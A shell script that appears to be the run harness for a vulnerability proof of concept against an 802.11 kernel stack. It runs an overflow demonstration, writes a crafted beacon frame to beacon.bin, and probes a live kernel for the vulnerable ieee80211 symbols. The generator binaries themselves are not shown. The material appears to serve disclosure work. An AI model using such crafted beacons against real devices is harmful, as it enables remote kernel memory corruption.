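#!/bin/sh
# DF-0326 run script.
#   1) code-level overflow proof (userspace replica of struct ieee80211_node tail)
#   2) crafted-beacon generator (raw 802.11 frame bytes -> beacon.bin)
#   3) reachability/environment probe on the live kernel
#
# Steps 1 and 2 are fatal on failure: their artifacts are the evidence the run
# exists to produce. Step 3 is best-effort: nm/ifconfig may be absent or the
# kernel may lack the symbols, and that outcome is itself part of the record.
# "RUN_OK" is printed as the last line only after steps 1 and 2 completed.
#
# POSIX sh only (no pipefail), so the `hexdump | head` and `nm | grep` pipelines
# report the status of their last stage; the preceding commands are guarded
# explicitly where their failure matters.
set -e

# Print a diagnostic to stderr and abort the run with status 1.
die() {
  printf '%s\n' "$*" >&2
  exit 1
}

# Section banner; output format matches the previous "===== … =====" lines.
banner() {
  printf '===== %s =====\n' "$1"
}

# Step 1: run the userspace replica that demonstrates the overflow at code level.
# node_overflow's own exit status decides the outcome; non-zero aborts the run.
step_overflow() {
  banner "node_overflow (code-level proof)"
  [ -x ./node_overflow ] || die "./node_overflow missing or not executable (build it first)"
  ./node_overflow
  echo
}

# Step 2: write the crafted beacon to beacon.bin and show its head and size.
# The generator writes to a temporary name first so a failing run never leaves a
# truncated beacon.bin behind that a later consumer could mistake for a good one.
step_beacon() {
  banner "beacon_gen 192 > beacon.bin"
  [ -x ./beacon_gen ] || die "./beacon_gen missing or not executable (build it first)"
  ./beacon_gen 192 > beacon.bin.tmp || { rm -f beacon.bin.tmp; die "beacon_gen failed"; }
  mv beacon.bin.tmp beacon.bin
  echo "first 96 bytes of the crafted beacon (hexdump -C):"
  # 6 lines x 16 bytes = 96 bytes; od is the POSIX fallback when hexdump is absent.
  if command -v hexdump >/dev/null 2>&1; then
    hexdump -C beacon.bin | head -n 6
  else
    od -A x -t x1 beacon.bin | head -n 6
  fi
  echo "beacon.bin size:"
  ls -l beacon.bin
  # Informational hint for the reader of the dump; nothing is computed here.
  echo "--- decode: byte at offset 0x26 (38) is fc0 subtype, SSID IE tag+len at body offset 0x18..0x19 ---"
  echo
}

# Step 3: best-effort environment probe. Every command here may fail without
# aborting the run, so a missing tool or symbol is recorded rather than fatal.
step_probe() {
  banner "live-kernel reachability probe"
  echo "--- vulnerable symbols in /boot/kernel/kernel (T = live text) ---"
  nm /boot/kernel/kernel 2>/dev/null | grep -iE 'ieee80211_sta_join|ieee80211_init_neighbor|ieee80211_add_scan' || echo "(nm not available or symbols absent)"
  echo "--- SSID_INVALID status flag consumers (should be NONE) ---"
  # Informational only: the grep is described, not executed, on the live host.
  echo "grep -c BPARSE_SSID_INVALID across the wlan tree: live kernel is closed-source; see env.txt host-side analysis"
  echo "--- 802.11 interfaces present (radio check) ---"
  # Previously unguarded: an ifconfig failure aborted the run before RUN_OK.
  ifconfig -l || echo "(ifconfig -l not available)"
}

main() {
  # Run from the script's own directory so the PoC binaries and beacon.bin are
  # resolved relative to the finding, not to the caller's cwd.
  cd "$(dirname "$0")" || die "cannot cd to script directory"
  step_overflow
  step_beacon
  step_probe
  echo "RUN_OK"
}

main "$@"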